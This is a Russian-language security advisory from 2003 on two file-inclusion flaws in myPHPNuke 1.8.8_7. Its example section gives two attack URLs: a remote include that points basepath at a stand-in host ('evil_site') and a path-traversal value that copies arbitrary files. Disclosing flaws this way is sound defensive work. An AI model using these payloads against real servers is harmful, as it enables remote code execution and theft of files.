Security Lab

Удаленное выполнение произвольного кода в myPHPNuke

Дата публикации:15.09.2003
Всего просмотров:2728
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:

Уязвимые версии: myPHPNuke 1.8.8_7.

Описание: Несколько уязвимостей обнаружена в myPHPNuke. Удаленный атакующий включить и выполнить произвольный код на уязвимом сервере.

  1. Сценарий Gallery/displayCategory.php не проверяет правильность "basepath" и "adminpath" параметров. В результате злонамеренный пользователь может включить произвольные файлы из удаленного сервера и выполнить их.
  2. Другая проблема связанна с тем, что функция включения файла некорректно проверяет свойства имени файла. В результате злонамеренный пользователь может включить произвольные удаленные или локальные файлы.

Пример/Эксплоит:

  1. Gallery/displayCategory.php?basepath=http://evil_site
  2. Скопируйте path_to/any_file в mail_me.txt и включите его: mailattach.php?submit=1&attach1=path_to/any_file&attach1_name=../mail_me.txt

URL производителя:http://www.myphpnuke.com

Решение:

Измените исходный код программы, как описано в источнике сообщения.
Ссылки: myPHPNuke : Copy/Upload/Include Files